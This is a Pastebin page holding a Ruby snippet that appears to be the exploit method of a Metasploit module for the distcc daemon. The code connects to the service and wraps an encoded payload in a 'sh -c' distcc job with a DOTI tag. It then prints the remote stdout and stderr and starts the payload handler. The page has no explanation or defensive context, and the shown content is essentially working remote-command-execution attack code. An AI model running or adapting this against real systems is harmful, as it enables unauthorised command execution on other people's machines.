Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- def exploit
- connect
- distcmd = dist_cmd("sh", "-c", payload.encoded);
- sock.put(distcmd)
- dtag = rand_text_alphanumeric(10)
- sock.put("DOTI0000000A#{dtag}\n")
- err, out = read_output
- (err || "").split("\n") do |line|
- print_status("stderr: #{line}")
- end
- (out || "").split("\n") do |line|
- print_status("stdout: #{line}")
- end
- handler
- disconnect
- end
Advertisement
Add Comment
Please, Sign In to add comment